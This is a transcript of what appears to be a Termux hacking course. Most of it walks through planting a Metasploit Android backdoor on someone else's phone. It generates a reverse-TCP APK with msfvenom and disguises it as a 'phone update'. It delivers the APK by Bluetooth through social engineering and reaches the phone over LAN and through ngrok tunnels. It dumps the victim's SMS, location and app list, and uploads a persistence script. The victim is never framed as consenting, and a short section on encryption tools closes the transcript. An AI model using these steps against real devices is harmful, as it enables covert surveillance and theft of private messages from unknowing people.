So now I hope Metasploit has been successfully installed in your Android device and you're getting Metasploit framework installation finished in your screen. Next, let us see how to run and test Metasploit framework. If you directly type Metasploit, it will show command not found. So, first of all, we need to go inside the Metasploit framework directory. Now, if you have installed correctly as demonstrated in our last video lecture, then you need to first go to user directory. So, for that, first cd space dot dot. So once you have typed cd space dot dot, then when you will type ls command, you will see usr directory, that is user directory. Change the directory to user, then ls. Next, we need to go to opt directory. Now as you can see, Metasploit framework is now inside the opt directory. So now we'll change the directory to Metasploit framework. Simply type cd space Metasploit framework and hit enter. One more thing, make sure you remember how we came till Metasploit framework, because this is how we need to do everything. This is how we need to do every time when we'll be using Metasploit. As you can see, we are inside the Metasploit framework. There are many files and folders inside it. Now simply type dot forward slash msf console and hit enter. Now what is the MSF console? The MSF console is probably the most popular interface to the Metasploit framework, MSF. It provides an all-in-one centralized console and allows you efficient access to virtually all the options available in the MSF, that is Metasploit framework. MSF console may seem intimidating at first, but once you learn the syntax of the commands, you will learn to appreciate the power of utilizing the interface. Now, once everything is installed successfully, you will see the number of exploits, auxiliaries, posts, payloads, encoders, and nopes available. Now we have come across all the terms in our previous video lectures and reading materials. So till now, if you face any problem regarding understanding of any terms or the installation procedure, feel free to reach out. Thank you so much. See you in the next class. Till now, we have successfully installed Metasploit framework and run the MSF console. Now, we can use the help command to see what are the commands available inside the MSF console.
Simply type help and hit enter. Just scroll up and see the various commands available. Now here we'll try to use the banner command. As you can see, as soon as I have written banner and hit enter, the banner has been changed. Hello everyone and welcome to the class. Now in this video lecture, we'll quickly go through a practical demonstration of Metasploit exploits and payloads over LAN. So first of all, what is a LAN? LAN, that is a local area network, is a computer network that interconnects computers within a limited area such as residence, school, laboratory, university campus or office building. So, if any device is connected to our home Wi-Fi or router and we are in the same LAN, we are in the same LAN network, the attacker can easily get into the victim's mobile device. Very important note is, victim and the attacker should be in the same network. Say for an example, the attacker is connected to a home Wi-Fi named as ABC, and if victim is also connected to the same Wi-Fi network, then only the attack would be successful. Now, if the victim is using his or her own data pack, then this over the LAN attack won't be successful. For that case, we have another attack called as over the WAN attack, which we will cover in our upcoming lecture. So considering that attackers and the victim both are in the same Wi-Fi network, first we'll go inside the Metasploit framework directory and make sure you follow the steps properly. Otherwise, you won't be able to generate the payload. So next, we'll type dot forward slash msf venom. In simple terms, MSF Venom is used to generate the payloads for any operating system. And then -p for payload. Then we need to generate payload for Android. So Android forward slash meterpreter forward slash reverse TCP. So by typing this, we are mentioning that we are generating a payload for Android device. So therefore we need a meterpreter session of an Android device and we will do the exploitation in the reverse TCP. I'll come once again. In simple terms, MSF Venom is used to generate payloads for any operating system, and then -p for payload. Then we need to generate a payload for Android. So Android forward slash meterpreter forward slash reverse TCP. And so by typing this, we are mentioning that we are generating a payload for Android device. So we need a meterpreter session of an Android device. And we'll do the exploitation in the reverse TCP. Then we need to write lhost. So lhost is listening host. So now open up a new session in Termux. Make sure you're connected to a Wi-Fi and type ifconfig. Make sure you copy the WLAN, that is wireless LAN IP, and paste it as demonstrated in the video lecture. One important point to remember, IP address are different for different devices. And one more important thing, if you are facing any problem in understanding LAN, WLAN or IP address, please go through the articles and reading materials attached in this course. And also very soon I'll be coming up with complete networking course for beginners, which will be very useful for all of us to understand the use of computer networks. So coming back to our payload generation, after lhost is given, we'll write lport, that is listening port. We have a range of 65,000 ports available in our system. So we'll simply use any port number, say example 4444, and then type in -o for output and give the path, like where you want to save this payload in your device. So here I am using L port as 8080, -o for output, and then giving my location, like where I need to, where I'll download this, where this test.apk will be generated. It will take a few seconds to generate. As you can see, the payload has been successfully generated. So we have completed this step 1. I'll come again, like after minus O stands for the output and will give the path. Okay, so in this we have given the path as /SD card, and inside the SD card we have given the APK name like test.apk. So as you can see, uh, it has the payload has been saved as SD card, inside SD card test.apk. Once you will open up your internal storage, you'll find inside SD card test.apk have been generated. Now next we'll install MI Explorer. Search MI Explorer APK and install from up2down.com. So basically MI Explorer is a comprehensive file management tool that helps you to work comfortably with all the files and folders on your Android. What's more, it has a clean and well designed interface that's also totally customizable. So once it is installed, that is MI Explorer, next we'll sign the APK. So we'll download the latest version. I've already downloaded, so it's there in my device. Once MI Explorer is installed, next we'll sign the APK. Application signing ensures that one application cannot access any other application except through well-defined IPC. So when an application, that is APK file, is installed onto an Android device, the package manager verifies that the APK has been properly signed with the certificate included in that APK. So as you can see, I have opened MI Explorer and inside internal storage I can see test.apk. So the test.apk is there inside my internal storage. In the right hand side you can see there is an option sign. Add it to the task, sign, and then auto. As you can see, test sign.apk has been created. Now next, with the help of social engineering, we'll send it to our victim with the help of Bluetooth, share it, or whatever platform you want. With the help of social engineering, we'll send it to our victim. Now as you can see, I am sending the file to my victim with the help of Bluetooth. So sending file to Redmi. As you can see, this is my victim's device. The file this is the incoming Bluetooth file. We need to accept it. Test sign.apk. So the file is inside my victim's device. Now he or she just need to install this APK. As you can see, the APK has been successfully delivered, sent to my victim device. So now we'll come back to, as an attacker, I'll come back to my attacking device. The device from which I'm attacking. So I'll go to my Termux and start MSF Venom. I beg your pardon. I'll start the MSF console. So type MSF console. Also make sure your device is still connected to the Wi-Fi, or else it will cause an error. Now starting the Metasploit framework console. Yeah. Now type use exploit multi-handler. Make sure you type it correctly as shown. So this multi-handler ensures that it makes the connection between the attacker and the victim. And after this, if you forgot the command, then type show options. It will show you all the things required. Since we know, then we'll proceed with lhost and lport. Again, make sure The attacker and the victim are in the same Wi-Fi network. Now type set payload Android Meterpreter. Reverse TCP. Now set the L host. So we'll quickly open up the session and we'll copy the WLAN IP address and paste it. Okay, and now we'll set the port. Remember the port which we have used? Yes, we'll set L port 8080 and then we'll hit exploit and hit enter. I mean type exploit and hit enter. And now we'll wait for the victim. As soon as the app gets installed and once the victim will definitely try to open it. But it won't be opened. That's the time when your session will be created. So let's just wait for our victim to install the app and we'll just wait for the victim to once click that app once it's installed. As soon as he or she click that app, we'll get the session. As you can see, now we are inside our victim's device and will quickly install testsign.apk. Most of the time it will pass the scanning as well. So as you can see, the app has been installed in my victim's device, but when he or she will try to open it up, it won't get opened, but a session will have been created in our from attacker's session. I mean, when we'll go back to our attacker's device, we'll see a session has been created. So now we are back in our attacker's device. So as soon as we have written the command exploit and hit enter, a reverse TCP handler has been started with the IP address and the port number which we have provided. Now as soon as our victim will try to open the app, a session will be created. So I'll come once again. As soon as the attacker type the exploit command and hit enter, a reverse TCP handler will get started on the IP address and the port number which we have provided. So as soon as the victim tries to open that app, a session will be generated. As you can see, the session is getting created. Once the session is created, you will see the Meterpreter. Yes. So now we can type the help command, and with the help of help command we'll see all the various commands available for an attacker to get inside, I mean to see what to get the information from the victim's device. We have background session, we have bg kill, that is background kill, background list, background run. There are so many commands. With the help of type help command, and you will see a list of commands that are available for an attacker you know to exploit his or her victim. There is mkdir, mv, pw, whatever the commands we have learned in our course, everything can be executed in our victim's device. Yes, we can dump the sms. this means that whatever SMS are there inside our victim. Oh, you can see the session has died because our victim has uh, somehow rebooting his or her system, his or her device, or uninstalled this app, or simply locked the device. That's why the uh, session has been died. We'll learn how to make it persistent in our coming video, so that whenever our victim is rebooting his or her system, or closing the session, or I mean closing or locking his or her device, we'll still have the uh, you know will still have the session up and running. So currently the session has been died because our victim has locked the device. So yeah, I was talking about dumping the SMS. The dump SMS command, which you can see in the screen, is used to get all the SMS available inside our victims. Will dump all the SMS into our attacker's device, and we'll get everything. So as you can see, once the session is showing died, so we cannot run the commands. We again need to go through all the procedure. We'll go once again. As you can see, we are once again inside the Metasploit session, and as soon as we'll type app list, this is a command which will give all the list of, I mean all the apps available, downloaded in our victim's device. So we can see the various apps installed in our victim's device. We can again use the help command, and from there we'll see the list of commands. Yeah, dump SMS, which I was talking about. There is also geolocation. Let's try this. So if you type the geolocation, you'll get the geolocation. So this is the geolocation of our victim's device. This is a very cool technique. You can use it in forensics as well to understand where is your victim. If you are making if you are trying to catch up a thief, or a big criminal, you can send this as a payload, and once he or she downloads it, you can directly get his her longitude and latitude, and you can uh, you know catch him or her easily. So yeah, I was talking about dump SMS. So type dump underscore SMS. Yes, you can see 15 and SMS has been fetched, and it has been saved as .txt file. So you can use a new session CD to our once to you can come out. Yes, you can copy this file name. You can go to a new session, and just simply you can do cat and hit enter. You will see the various SMSs available inside our victim's device. So yeah, you can try various other commands. Hello everyone, and welcome to the class. Now, in our previous class, we learned how an attacker can get into the victim's device if they are in the same network. But suppose your victim is sitting somewhere in other country, or simply your victim is not in your network area. Then how an attacker will get into the device? For that, in this video lecture, we'll learn how we can use Metasploit exploits and generate payloads over the WAN, that is wide area network. So quickly we'll understand what is WAN. So a wide area network, also known as WAN, is a large network of information that is not tied to a single location. WANs can facilitate communication, the sharing of information, and much more between devices from around the world through a WAN provider. Best example of WAN can be an internet. Go through the reading materials attached. If you face any problem in understanding the terms, feel free to reach out. Okay, so for over the WAN attack, we'll be using port forwarding, and we'll use the platform that is NGRock. Now let's understand what is port forwarding. In computer networking, Port forwarding or port mapping is an application of network address translation, that is NAT, that redirects a communication request from one address and port number combination to another while the packets are traversing a network gateway such as a router or a firewall. Now, ngrok allows you to expose a web server running on your local machine to the internet. Just tell ngrok what port your web server is listening on. So again, a reminder, if you are new to networking, just don't worry and follow the reading materials provided in the course. You will understand the basic functionality. So, moving to the practical part now, first open up your browser and type ngrok and then quickly sign up, and you will see the dashboard and you can see the dashboard as in your screen you can see, and then click download for Linux. Once it is downloaded, you will see the files and the folder inside the download directory in your internal storage. Now select the authentication and copy the auth token. This is your auth token. You need to copy it. Now we'll quickly jump back to our termux. Now type cd/sd card /download. As we know that it has been downloaded in the download folder. Next, we'll quickly move it to our home directory. So for that, simply type mv ngrok star, that means all, and then $home. So it will move the file to our home directory. If you do ls, you'll see the zip file. Now we need to unzip the file. So for that, we'll use the unzip command. So we'll copy the file name, okay, and type unzip and paste the file name. Hit enter and then ls. You'll see ngrok file. Now we'll paste the authentication token which we have copied earlier. And hit enter. So now simply type //ngrok. We can use HTTP or reverse TCP and the port number, and then hit enter. So before we do that, let me clear you one thing. We can start ngrok with our own mobile data on, and we can also start ngrok with our Wi-Fi on. So there are two ways. Okay. So in our first demonstration, I'll show you how to start ngrok and create the payload with our data on. So when our data is on, make sure you also have turned on your hotspot. A small spoiler, I tried with my data on, and most of the time at the end of my payload generation, hotspot gets turned off. Okay, so for using this mobile data on and the hotspot, this is the video. I'll demonstrate you how we can use our mobile data, and with the help of hotspot we can create the payload. So now you need to follow the steps as demonstrated in the video lecture, and if you have successfully created the payload and once your victim installs the app and the session is established, then you have done it perfectly. But if you face the hotspot getting off most of the time, as in my case, so In the next video, I'll show you how you can do with the help of Wi-Fi as well. So don't be disappointed if you're not able to do the attack with your mobile data and hotspot on. The next method in the next video will definitely work. So if you face any problem in this video with mobile data on, so kindly skip to the next video. So now coming back to the NG-ROC, let's begin. So as you can see, I have cleared my screen and I'm starting it from the scratch again. And make sure your data and hotspot both are turned on. So type dot forward slash ngrok. Now I want to open a port of TCP protocol. So type TCP and random 4-digit number. Remember it, okay, and hit enter. So I have used 4040 as a port number. Make sure your hotspot is turned on. Now you can see your connection will be established. Yeah, now your session status is showing online. Also, as you can see in front of web interface, we have provided a port number as 4040, but once the port forwarding is done, you can see your L host will be TCP forward slash 0.tcp.ngrok.io, and your forwarded port number, that is L port, would be 18985. This will be different for different, the port number will vary according every time you try to start on the session, your port number will vary. Okay, so now we need to generate the payload. So we'll go to the Metasploit framework directory. We'll type msf venom as we did for LAN, but your L host will not be the IP which we used in the LAN. Otherwise, it will not do the port forwarding. So msf venom -p android meterpreter reverse underscore tcp, your L host will be the forwarding, the L host which we have received while our session turned on. Okay, so once again we'll go to our ngrok session, we'll copy it from tcp till .io, okay, and we'll paste it. Okay, and thereafter L port will be the port which we have, which ngrok has provided us, that is 18985. And then -o for the output, and will provide the destination where our APK would be saved. So forward slash SDK, SD card, and our APK name. So let's give it the name as phone update.apk. You can write it you can give it any name, then hit enter. It will take few seconds, to generate the payload. So yeah, our payload has been generated, and the rest procedure is same as we did for the LAN in the previous, in our earlier videos. Again, we'll go to mi explorer. There we'll find our apk that is named as phone update.apk. We'll click it and we'll sign it with the help of auto. Next, we'll send it to our victim via Bluetooth or share it. The procedure is almost same as we did in the LAN, just we are doing here extra is the port forwarding. But mind it, your data should be on and your hotspot should be on. Both of the things should be on. Okay. Now we signed it and hit auto. Next we'll send it via Bluetooth. Due to some network issue, my internet was turned off, and so the NGRock session was closed. So I am again following the procedure as I have explained in our last video lecture. So do follow the step once again and you'll see your L port in the port forwarding will be different as we are creating a new session. So let's begin. As you can see, I have turned on my hotspot, and once again I'll try to establish a session, and yes, the session has been established, and this time the you know you can see the forwarding, the port is 14189. Will come once again there. Okay, so now let's start with creating the payload. We'll just go inside our Metasploit framework, then we'll use MSF Venom. The procedure is same, so yeah, we're inside now Metasploit framework. As you can see, the yes, still the hotspot is on. Okay, so MSF Venom minus P Android / Meterpreter / reverse underscore TCP. The hell host, we need to copy it from the session. Yeah, till IO, from TCP till IO. You can see 14189 is your L port now. Okay, so we'll paste the L host, and then we'll write give our L port. So L port 14189. Okay, so L port is 14189. So minus O for output, and then we'll provide the location. So / SD card, that is our internal storage. Yeah, and then our APK name. So ngrock test.apk, you can say, and hit enter. Just wait for few seconds. Just make sure your hotspot is still on, otherwise this will again fail. Okay, so wait for few seconds. Yes, your APK has been generated successfully. As you can see, I am again inside the MI Explorer, and inside that we have internal storage, and inside internal storage we have ng rocktest.apk, which we have created. So we'll just sign it and send it to our victim via Bluetooth. We'll try once again. Make sure your hotspot and data is perfectly turned on. Now as you can see, we are again inside our victim's device, and there is one incoming file which is known as ng rock test.signed.apk, which we are sending from an attacker to the victim's device, and we'll follow the procedure. Follow the steps as we did for the LAN. Now as we can see, we have successfully installed the APK in our victim's device. Now we'll come back to our attacker device, and start the Metasploit. Now as you can see, we are inside the attacker's device, and from here we'll type MSF console and hit enter. So you can see the Metasploit framework console will start. So we'll check the database. So db underscore status, so the database is connected. Alright, so rest the procedure is almost the same. Use exploit Android. So we are using the exploit for the Android, so we'll use multi handler, and then we'll set the L host and the L port. Okay, first we have written use exploit multi handler, then set payload Android metapreter, as we're using the Android, and we're using reverse TCP. Okay, so now we'll provide the L host. So set L host equals to, we'll go to the another session, and yes, we'll copy this forwarding. So make sure you copy correctly. Okay, it starts from 0.tcp.ngrok.io. Okay, you should not copy from the starting like http and everything. Okay, now next we'll provide the L port. So L port here will provide 4040. Make sure you're providing the L port which we have given in our starting. L port here would be the port from our, just see the hotspot turned off. Okay, so now again we need to create the session once again. The since our hotspot turned off, once again we'll face the problem. So make sure that when you are setting the L port, you are giving the port number of your device which we have provided at the starting. So we provided 4040, right? 4040. So we are providing L port here 4040. Yes, as you can see, the session was not created because our hotspot was turned off. As you can see, since my hotspot is turning my I mean since my hotspot is getting turned off, so therefore I'm not able to create the session. But if you are not facing the hotspot off issue, then you will be successfully starting the session. So whosoever is facing the same issue like hotspot is turning off, so in the next video I'll show you how you can use your Wi-Fi to create the payload. So thank you so much, and see you in the next class. Hello everyone, and welcome to the class. Now if you didn't face any problem and successfully created the session in our last class, then kudos to you. In this video lecture, I'll show you how you can do the same procedure with the help of Wi-Fi. First, we'll remove the ngrok files and folders from our storage, and we'll do the procedure once again. We'll install ngrok and everything, but in a different manner. So make sure you follow the commands without any spelling errors. Let's begin. Type ls. As you can see, the ngrok uh, file is there, a file and folder is there, so we'll simply remove it. So for that we have a command rm. Yeah, so as you can see, the ngrok has been removed. Also we need to remove this zip file as well. So simply rm, and we'll paste the file name and hit enter. So now in our device there is no ngrok. Okay, as you can see, and my present working directory is home. Okay, so first of all we'll update and upgrade our device. As you can see, my Wi-Fi is connected. Now I am not connected with my mobile data. Alright, so first we'll update and upgrade our termux. As you can see, my termworks have been updated and upgraded. So next, simply we'll use the command which we have copied from the Chrome. The Chrome display is not visible because there is some screen issue. So screen visibility issue. So I'm just pasting the command. So you'll do pkg install wget unzip -y first. So after successfully updating and upgrading our termworks, our first command was pkg install wget unzip -y. And our next command is wget https, and I mean we are cloning it from the GitHub. Okay, you remember why we use wget? Yes. So we are simply not cloning, we are getting the zip from our GitHub. So I'll give you, I mean I'll put the command in our reading material so that you can simply copy it from there and paste it. Okay, so you need not write to you need not write the full command. So yeah, till now after updating and upgrading we have given two command. First was install wget if the package was not installed for the, and the next was wget, and we are getting the zip file from GitHub and hit enter. As you can see, the zip file is getting downloaded. So the next command is unzip. We'll copy the file name and unzip it and hit enter. As you can see, ngrok file is there in our termworks. Now the next step, we'll change the mode. We'll use chmod and we'll change the permission to full permission. So ngrok will get the full permission. So chmod plus x ngrok. Next we'll clear the screen, and as we know, we have successfully downloaded the files and extracted it. I mean extracted the ngrok. So now we'll again follow the same procedure as we did in our previous classes. Type in /ngrok. We'll follow the same procedure as we did in our last class. Okay, so nothing much, just the downloading procedure was very important. If you have followed the steps as demonstrated in the video, then this time you will be successfully generating the payload and session as well. I mean you'll successfully create the session. I have given the port as 8080. So just wait, and this time you'll surely gonna get the session status online. Yes. So we did it with the help of Wi-Fi. Now just you know see our web interface. It is showing 4040, and we have the forwarding as ng.ngrok.io. Yes, we have created all the sessions. Now the next thing is we'll start the MSF. The MSF Venom. Yes, just check once your Wi-Fi is turned on. Yes, my Wi-Fi is turned on. Next, we'll go to uh, MSF Venom and we'll create and generate the payload. Oh, just a reminder, we did the HTTP for a try, okay? So we are again going, we will be creating TCP because we'll be using the TCP port. We are just, testing for, since we are able to, turn our session on or not. So we did HTTP. So now we did TCP with the port number 4444. So remember we used the port number as 4444 and in the web interface we are getting 4040 port number. Also in the forwarding we are getting 13434 as a port number. So now the next thing is we'll paste the authentication token. You remember last time we also copied it from the ngrock website and pasted in our in our termux, right? So again we'll copy and paste the authentication token after we have generated the session. Okay, earlier what we did, dot forward slash ngrock tcp, and we have provided the port number as 4444. This 4444 port number is our device port number which we are providing, and every time the session is created a different port number will be generated from the ngrock. Okay, so after we have given this command dot forward slash ngrock tcp 4444 as a port number, next we'll paste the authentication token for if you just don't remember from where we'll get this authentication token, just log in to ngrock website. There you will find authentication, and in authentication tab you will, in the right hand side you will see, topmost right hand side you will see ngrock authentication is there. Simply copy, paste it and hit enter. As you can see, the session has been successfully created and showing session status online. Alright, so once again we'll check whether our Wi-Fi is turned on or off. Yes, our Wi-Fi is turned on. See, there is no mobile data on, no hotspot on. Next, we'll just open up a new session and we'll go to Metasploit framework. So you can see my present working directory is home, cd space dot dot ls, cd usr, then cd opt, then ls will see Metasploit framework, right? So cd Metasploit framework dot forward slash msf venom minus p, same procedure as we did last time. Okay, android meterpreter forward slash reverse tcp. So for the L host, again we'll go to our ngrock session, we'll copy it. Make sure you copy correctly, okay, from 0.tcp.ngrock.io. Only this much will provide to L host. Yeah, okay. And for the L port, the port which ngrock has provided us, that is 19691, right? 19691, and then minus O for output, and then the location, SD card, that is internal storage, and the name of the APK. By now you must be familiar with all these terms, right? Because we have been practicing from from past quite a few classes. Yeah, so I'm giving it the name as zzz1111.apk for our easy, for our convenience. Just wait for a few seconds and your APK would be done. Alright, it's saved. Next, dot forward slash msf venom. This time you just need not write that you know sorry, msf console. Yeah, make sure you write the correct spelling. Oh, I'm not in, I'm in directory msf console. Just a second. Oh, I have written MFS, so it's MSF console. So yeah, make sure you write the correct spelling, okay? So it's MSF console. Even I'm getting confused at times. So yeah, dot forward slash MSF console and hit enter. Your Metasploit framework console will start. So next, first check your database is connected or not. So for that, db underscore status. Yes, connected to MSF database. Now, the same use command which we used to do. Now before that, let's sign the APK and send it to our victim. Sign and share it, auto, and then share it via Bluetooth. As you can see, we have shared our file and the same method like our and it has successfully been sent. So the same method, our victim must have installed it. Must have not, I have installed it. So yeah, and also now it's time to exploit and try the exploit. Okay, so yeah, I'm not showing that installation procedure again and again. So it's the same way. Just click the click the APK and install it. Okay, now we'll use the use command as we did earlier. So use exploit and forward slash multi forward slash handler. Next we have set payload Android meterpreter. Next we'll set the L host. Make sure you give the correct L host. And next, the very important L port. You remember which L port we have said at the beginning of our session? Yes, 4444. I hope I am right. Sorry, 4040, right? Yeah. So yeah, we have just a minute. I'll So as you can as you have seen in our session, it was 4040 L port, but in our earlier session we have set it to 4444. Always write the L port which is, the port which has been given from our session. Okay, just a second, I'll show you once again. Oh no, can you see the blunder which I made? I have set the L port as 4040, which was there in the session, but that's not the port, that's the web interface. If you come to the session 1 and see, that's a web interface which has been provided by ngrok. Our port was 4444 which we have created. So for that, if I now type exploit and hit enter, the session won't be created. Make sure you do not do this mistake which I am doing, which I've done here. Okay, so make sure you'll while you are setting the L port, the L port should be the port which you have given at the time
of setting the ngrok dot forward slash ngrok and then TCP and the port number. Okay, not the web interface port which has been shown in the ngrok. Okay, as you can see, as soon as I type exploit and hit enter, no session was created is showing up. Yeah. Hello everyone and welcome to the class. Now you might be having a question like every time victim turns off his device, the session gets disconnected, right? Okay, so in this video lecture, I'll show you how attackers make the backdoor persistent in the victim's device. So with a persistent session, even if the victim's device is turned off or turned on again and again, if he or she is just locking his or her system, device, even then we'll get back the session. So now we'll quickly write a short bash script. So for that we need to open up nano. So type nano and the file name. Say syslog.sh and hit enter. Okay, so nano is not installed. Okay, so we'll just simply install nano pkg install nano. You can write this bash script, or you can just directly get this bash script from the reading material. It's just for understanding and you know understanding how this bash script is working, so you can also make changes inside it. Alright, so our nano has been successfully downloaded. We'll quickly write a short bash script. For that we need to open nano, give it a name that we have given syslogs.sh. Okay, so the first line hash bin bash. Yeah, it is important as it recognizes the script as a bash shell script. So hash exclamation mark forward slash bin forward slash bash, it defines that it's a bash shell script. So we're using a while loop. So while true, do start the user android dot intent dot action. So this is the action which the android system gonna take as an action dot main. Okay, do you remember, every time when we install, it shows main activity? Yes, so this is the main activity which will, we have written sleep 20, so after every 20 seconds this main activity will be triggered from this bash script to the web. From this bash script will be updating. We'll be sending this to our victim, and this will update after after every 20 seconds. This bash script will update the main activity, will trigger the main activity. So our session will be you know keep on created after 20 seconds. So we'll just write cat syslog.sh and we'll see once again if our whatever we have written inside the bash script is okay or not. All right, now the next procedure is very simple. Just since we have done it in home, right, so we'll just copy it to SD card. Now the rest procedure is all same. Okay, we'll go to the Metasploit folder. Since we have copied that to our SD card because we'll be uploading from our SD card, from the attacker's SD card to the from the attacker's SD card, from the attacker's internal storage, we'll be updating or uploading to our victim's storage. Okay, so yeah, we are inside the Metasploit framework now, and we'll follow the same procedure as we used to do. You remember, right? We have given our sleep time like 20 seconds. Like after every 20 seconds, it will trigger the main activity. So whether it is logged, turned on, turned off, it will work. This will make this bash script will make our app persistent, and a session will be created after every 20 seconds or 40 seconds, whatever. You can change the time, you can give it. Okay, so for L what we are doing, yeah, for the L host, right? So the IP will just copy this IP, make sure you are connected to WLAN. Okay, no, we don't need this ngrok, no, nothing, just simply we'll give the L host. This is the thing, this is the same thing as we did for you remember LAN. Yeah, so same. So L host, you'll give the IP address, then L port 4444 minus O, then SD card, and the location. Say Z1 or whatever. Z persistent, you can say. Persist.apk. Just wait for few seconds. Okay, so our persist.apk has been generated. So simply we'll again sign that apk and send it via Bluetooth. So as you can see, we are inside our victim's device. So incoming file z persist dot I mean hyphen signed apk. So we'll again simply download, install the file. Same procedure as we did earlier. So now as you can see, scanning is also done and the app has been successfully installed. So we'll come back to our attacker's device. Now we are inside the attacker's device. We'll simply write msf console and hit enter. Okay, so our Metasploit framework has started. First, we'll check if our database is connected or not. So db underscore database status, yes, connection connected to MSF database. Yeah. So again, the same procedure. Use exploit multi handler. Just a second. I guess again there is some spelling error. So use exploit. Yes, there was some error in the typing the command. All right, then we'll use the set payload Android Meterpreter. It's almost the same, we are doing. So first we tried for LAN, then we tried for WAN. Then while we are trying for WAN, first time we did with the just a second, we'll first complete this. So set L host. So L host will be the IP of WLAN. Simply copy and paste it, and then L port. You remember the L port which you have, it's very simple, right? 4444. Yeah. And then exploit. Sorry, again command, some error in the command. So after set, you must give a space as well. Okay, so set space L port 4444. Next we just need to
type exploit and hit enter. Make sure your victim has installed the app so that it would be easy for us, to get the session. All right. As you can see, the session is getting created. Yes. Now we are successfully inside our victim's device. So now what we need to do, we need to upload our syslogs.sh bash script to our victim's device to make the connection, to make the session persistent. All right. So simply if you type ls, there is some error running ls, timeout error. Also, our session, okay, our session has been closed because our victim must have, locked the screen or rebooted the system. So again, we'll start the session. We'll type exploit and hit enter. For this reason, we are making this session to be persistent. Okay. So again, we'll type ls, no entry exists. I mean, there may some no entries exist in data. Okay. So we'll come. There is no files. Okay. We'll come again here. So we'll type sysinfo. We'll get the information about our victim's device. We know, as we have already used this command. So now it's time to upload the syslogs.sh, right? Let's do the cd / sd card. I mean, we are going inside the internal storage of our uh, victim's device, right? Okay, so now we are inside our victim's sd card, that is internal storage, since we have changed the directory to / sd card. Okay, so the reason why we didn't get anything while we gave the command ls, because we are not, because earlier we were not inside the internal storage of our victim's device. Now since we have changed the directory cd and / sd card, now we are inside the internal storage of our uh, victim's device. So now if we do ls, we'll get the list of all the files and directories of our victim's device, right? Type ls and hit enter. Now you can see all the files and folders inside our victim's device. Okay, so now it's time, ultimate time to upload the syslogs.sh. Okay, so now since we are inside our internal storage of our victim's device, simply write upload / sd card / syslog.sh. So this is from our internal storage. So this first / sd card was our internal storage. Now we are giving I mean, the last / sd card is our victim's internal storage. Okay, and hit enter. As you can see, it has been successfully uploaded. Now next. Now next we'll type ls and hit enter to check whether our syslogs.sh has been successfully uploaded or not in our victim's device. As you can see, syslog.sh, yes, it has successfully been uploaded in our victim's device. Now next, we need to type shell. As we need to execute this inside the shell of our victim. You remember shell, right? You can refer to the earlier videos and reading materials. So yeah, we are inside shell and type ls. As you can see, we are inside, yes, inside our shell. Syslogs.sh has successfully been there. Okay, so now we'll type sh syslogs.sh and hit enter. So now you can see our bash script has started. So after every 20 seconds, it will trigger the main activity. So this is how our session will be, persistent. As you can see, after every second, the main activity is triggered, right?
So you can just lower down the seconds. You can also make it to 10, 20, 30, 40 seconds, whatever you feel like comfortable for you. Okay, so after every 20 seconds you will see again a trigger will be coming up. Just wait for 20 seconds. Yeah, again after 20 seconds you can see a trigger is coming up. So now to stop this process, press Control plus C. So this triggering will stop. So yeah, remember one thing. Now this time your victim is not required to every time click that app. Automatically this once this bash script have been uploaded, so it will automatically trigger. So yes, Control C and Y, you're out, from this shell. Now you can perform all the tasks which you used to do earlier for the LAN and WAN and everything. So you can just simply type help. You will see all the commands there to execute. You can simply dump the SMS and everything. As you can see, Metasploit session 2 closed. Reason, the session is died. So once again, whatever is it, you can see the session is getting closed. It's no problem. Again, if you type exploit and hit enter, you will successfully get the session. Okay, you can also type sessions and hit enter to see whether your session is currently present or your session is died. As you can see, after writing session and hit enter, it is showing no active session. So simply write exploit, you will get the session back. Started reverse TCP and you can see your session is active again. So perform, yes, with the help, type help command and perform all the things which we have learned. Again, no problem. If a session is getting died, no problem. Again, you can type exploit and you'll get back the session. So at times you may face problem if victim's device is above Android version 8 because background process gets killed by the Android. So on that case, you need to again and again click the app and it will start working. No worries. Now you can use, like, if you want to know the sysinfo, just type sysinfo and you're getting all the details. Now a quick recap. What we did: first we tried for the LAN, then we tried for the WAN. In WAN we tried with NGROC. So first NGROC we tried with data pack on along with the hotspot, but most of the time our hotspot, in my case my hotspot was getting turned off, so I was not able to to generate the exploit and generate the payload. So for the next time, what we did, next time we again re you know I mean again we removed the files of ngrok and again we downloaded the file, and again we tried with the help of Wi-Fi, so it successfully worked for us. So for LAN we have one method, for WAN we have two method. Whatever method suits you, your device, it's perfectly fine. And the last one, what we learned is to make, for the WAN we did port forwarding as well. Okay, so we learned port forwarding as well. And the last last we learned how to make our APK persistent, so that whenever if our victim is turning off his her system, or not using the main active, not clicking the app, it's perfectly fine. Or he or she is switching, just locking his her device. Again, after every 20 seconds our bash script is running and triggering the main activity. So yeah, we are getting back the sessions. We can see like many times it is getting died, but again we are not required to write the full script. I mean full. I mean we are not required to do the full procedure. Just type exploit, and again we'll get the session back. So these are the few. I mean 3 or 4 important things which we came across with the help of Metasploit. Thank you so much. I'll see you in the next class. Hello everyone, welcome to the class. Now in this section we'll learn various tools to encrypt and decrypt and password protected files in Linux. So first question is, what is encryption? Encryption is the process of encoding files in such a way that only those who are authorized can access it. Mankind is using encryption from ages, even when computers were not in existence. During war, they uh, during war they would pass some kind of message that only their tribe or those who are concerned were able to understand. Linux distribution provides a few standard encryption decryption tools that can prove to be handy at times. Here in this section, we have covered 3 such tools with proper standard examples, which will help you to encrypt, decrypt, and password protect your files. Is the process of converting normal message, that is plain text, into meaningless message, that is ciphertext. Whereas decryption is the process of converting meaningless message, that is cipher, into its original form, that is plain text. As you can see in the example, a plain text, say your password is United Kingdom. So when it's encrypted, a ciphertext is generated, which is meaningless. Okay, and then when we'll decrypt it, the plain text will appear. So your password is United Kingdom. So this is the process. I mean, this is a very basic, simple example of how encryption and decryption is carried on. Okay. So next we'll come across various tools. So I have taken 3 important tools which we can use in our termux to carry out this process of encryption and decryption. Hello everyone and welcome to the class. Now in this video lecture we'll learn our first tool, which is known as Ccrypt. Designed as a replacement of Unix crypt, Ccrypt is an utility for files and streams encryption and decryption. It uses Rigendale cipher. Now what is Rigendale cipher? So the Advanced Encryption Standard, that is AES, also known by the Advanced Encryption Standard AES, also known by its original name Rigendale, is a specification for the encryption of electronic data established by the US National Institute of Standards and Technology, that is NIST, in 2001. Further, you can read it about you can read about this encryption in our reading material. So now, if you have not installed Ccrypt, you may use apt install Ccrypt. Now once it is installed, you can encrypt a file using Ccrypt. I'm again showing you how you can install it. Apt install Ccrypt. Okay, so first we'll create a file. So we'll use a text editor. We'll use Nano as a text editor. So Nano and the file name, say for example text.txt. So inside it you can write whatever you feel like. So once you have written the message, you'll save it, and we'll use this file name, that is text.txt, and we'll encrypt this file. Save the file. Also, you can cat text.txt and see whatever you 